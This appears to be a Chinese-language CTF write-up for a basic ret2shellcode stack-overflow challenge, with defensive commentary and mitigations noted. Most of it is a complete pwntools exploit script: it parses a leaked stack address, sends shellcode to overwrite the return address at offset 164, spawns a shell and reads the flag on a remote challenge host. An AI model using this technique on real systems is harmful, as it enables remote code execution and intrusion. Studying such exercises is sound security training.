总结
基础的 ret2shellcode 题目,直接用 pwntools 生成 shellcode 即可。从下面的脚本可以看出,该手法依赖程序在输出中泄露栈地址,并且要求栈可执行;开启 NX、栈保护(canary)并避免回显栈指针即可缓解。
EXP
#!/usr/bin/python3
# -*- encoding: utf-8 -*-
# author: roderick
from pwncli import *
# Write-up script for a CTF stack-overflow exercise. It talks to the hosted
# challenge in two "dump" rounds: the first reads an address the service
# prints, the second sends an oversized input built around that address.
#
# Defensive reading: the approach relies on (1) the service echoing a stack
# address back to the client and (2) an input long enough to reach data
# stored past the buffer. The binary's actual protections (NX, canary, PIE)
# are not shown on this page; a non-executable stack plus a stack protector
# is the standard mitigation for this class of bug.

# Tell pwntools which local ELF is targeted so asm()/flat() use its
# architecture and word size, and enable verbose I/O logging.
context.binary = "./root_me_stack_buffer_overflow_basic"
context.log_level = "debug"
# Connect to the remote challenge instance.
io = remote("node4.buuoj.cn", 29064)
# Assembly source for a shell-spawning payload, generated by pwntools.
sh = shellcraft.sh()
# Round 1: a short, harmless input, sent only to observe the reply.
data = "aaaa"
io.sendlineafter("Give me data to dump:\n", data)
m = io.recvline()
log_ex(f"Get msg: {m}")
# The first 10 characters of the reply are parsed and treated as a stack
# address. NOTE(review): int16_ex is a pwncli helper, presumably a base-16
# parse of "0x" + 8 hex digits on a 32-bit target; confirm.
# A service that prints a stack pointer undoes stack ASLR by itself.
stack_addr = int16_ex(m[:10])
log_address("stack_addr", stack_addr)
# Ask the service for another dump round.
io.sendlineafter("Dump again (y/n):\n", "y")
# Round 2 input: assembled payload at offset 0, the leaked address at
# offset 164, with flat() filling the gap between them.
# NOTE(review): 164 is presumably the distance from the buffer start to the
# saved return address; it is hard-coded and not derived on this page.
data = flat({
0:asm(sh),
164: stack_addr
})
io.sendlineafter("Give me data to dump:\n", data)
# Answering "n" ends the dump loop; presumably this is where the vulnerable
# function returns and the overwritten value is used (TODO confirm).
io.sendlineafter("Dump again (y/n):\n", "n")
# Read the challenge flag, then hand the session over to the terminal.
io.sendline("cat flag")
io.interactive()
引用与参考
1、My Blog
2、Ctf Wiki
3、pwncli